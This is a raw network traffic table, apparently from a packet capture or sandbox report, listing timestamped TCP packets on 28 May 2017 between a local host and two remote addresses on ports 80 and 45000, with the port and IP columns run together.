Mai 28, 2017 17:18:56.069940090 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.069964886 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.070197105 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.070235968 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.081741095 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.081767082 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.081775904 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.082003117 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.082046032 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.084598064 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.084626913 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.084779978 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.084819078 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.099319935 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.099349976 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.099570990 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.099613905 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.104274035 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.104569912 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.107458115 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.107486010 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.107495070 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.107719898 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.112874985 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.116817951 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.116843939 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.117064953 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.117109060 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.122545004 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.122742891 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.122786045 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.126477003 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.126507044 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.126698017 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.126734972 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.137825012 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.137855053 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.138030052 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.138075113 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.146353006 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.146384954 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.146394014 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.146480083 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.146502018 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.146678925 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.146725893 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.156625986 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.156653881 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.156805038 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.156847954 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.162739992 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.162941933 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.162983894 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.165383101 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.165415049 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.165769100 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.165808916 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.166963100 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.166994095 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.167402983 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.167438030 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.197824955 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.198107958 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.198151112 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.202780008 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.202807903 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.203030109 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.203073978 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.215271950 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.215302944 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.215312958 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.215528965 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.215574980 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.229916096 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.229943991 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.229953051 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.230176926 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.248138905 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.248168945 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.248177052 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.248336077 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.251549006 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.251576900 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.251586914 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.251810074 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.264018059 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.269937992 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.269963980 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.270185947 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.270230055 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.289419889 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.289449930 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.289458990 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.289649010 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.289695024 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.293304920 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.293492079 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.293535948 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.297403097 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.297431946 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.297662973 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.297707081 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.297914982 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.297945976 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.298147917 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.298182964 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.305953979 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.305983067 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.306162119 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.306202888 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.310024023 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.310055017 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.310302973 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.310343027 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.313894987 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.313925982 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.314146042 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.314191103 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.315434933 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.315447092 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.315851927 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.315884113 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.316643000 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.316673994 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.317394972 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.317615032 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.320229053 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.322766066 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.322793007 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.322926998 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.323930979 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.323961020 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.323971987 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.324098110 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.325717926 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.325747013 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.325757027 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.325882912 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.326925993 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.326956034 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.327133894 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.328254938 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.328289032 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.328299046 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.328699112 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.329041958 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.329071999 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.329082012 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.329179049 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.329952955 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.330796003 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.331162930 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.331197023 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.332259893 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.332288027 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.332518101 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.332554102 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.332814932 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.332851887 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.332945108 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.332969904 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.333379030 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.333408117 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.333740950 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.333766937 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.333897114 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.333928108 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.334139109 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.334163904 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.334422112 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.335946083 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.335975885 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.335984945 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.336360931 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.336395979 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.338120937 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.338149071 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.338243008 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.338269949 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.339323997 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.339354038 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.339363098 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.339489937 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.339518070 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.339894056 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.339921951 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.340379953 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.340404034 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.342016935 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.342046976 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.342056036 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.342200041 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.342228889 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.342567921 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.342962980 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.342986107 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.343103886 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.343138933 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.343293905 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.343317986 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.343596935 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.343621969 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.344383955 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.344408035 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.344455004 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.344494104 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.345571041 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.345593929 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.345623016 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.345937014 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.346091032 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.346118927 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.346128941 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.346313953 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.347213984 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.347559929 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.347934008 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.348637104 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.348664045 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.348949909 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.348975897 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.349559069 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.349916935 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.349940062 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.350203037 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.350229979 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.350328922 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.350353956 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.353327990 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.353363037 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.353696108 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.353718996 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.354337931 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.354357958 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.354690075 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.354715109 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.355911970 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.355946064 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.356045961 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.356070042 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.357883930 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.358248949 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.358270884 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.358464003 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.358707905 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.358728886 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.360023975 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.360053062 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.360152006 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.360184908 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.360613108 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.360641003 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.360719919 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.360744953 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.360786915 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.360810995 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.361485958 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.361500025 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.361521959 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.361799002 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.361819983 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.361886978 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.361910105 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.362384081 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.372849941 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.372872114 MESZ804923446.21.169.110192.168.1.16
Mai 28, 2017 17:18:56.373064995 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:18:56.807858944 MESZ4923480192.168.1.1646.21.169.110
Mai 28, 2017 17:19:48.265221119 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:48.265254974 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:48.266062975 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:48.269475937 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:48.269496918 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:48.826473951 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:49.028496027 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:49.028606892 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:49.051337957 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:49.051362991 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:49.306724072 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:49.540488958 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:49.540601015 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:49.871303082 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:49.871328115 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.332631111 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.346354961 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.346384048 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.346579075 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.346625090 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.352389097 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.352662086 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.352703094 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.360784054 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.360812902 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.361031055 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.361072063 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.405903101 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.406213999 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.406255007 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.432013988 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.432041883 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.432192087 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.432205915 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.432226896 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.433546066 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.433571100 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.445943117 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.445970058 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.446094990 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.446120977 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.473911047 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.474088907 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.474112034 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.478693962 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.478720903 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.478863955 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.478887081 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.487189054 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.487214088 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.487337112 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.487360001 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.538038969 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.538069963 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.538228035 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.538248062 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.556904078 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.557054996 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.557085037 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.619942904 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.619967937 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.620569944 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.620587111 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.627635956 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.627645016 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.630265951 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.630280972 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.641228914 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.641253948 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.641329050 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.641352892 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.782835960 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.783113956 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.783153057 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.821706057 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.821722984 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.821954012 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.821993113 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.920717955 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.920975924 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.921024084 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.934120893 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.934153080 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.934335947 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.934382915 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.988020897 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.988049984 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:50.988306046 MESZ4923545000192.168.1.16185.159.82.38
Mai 28, 2017 17:19:50.988351107 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.009366035 MESZ4500049235185.159.82.38192.168.1.16
Mai 28, 2017 17:19:51.009397030 MESZ4500049235185.159.82.38192.168.1.16
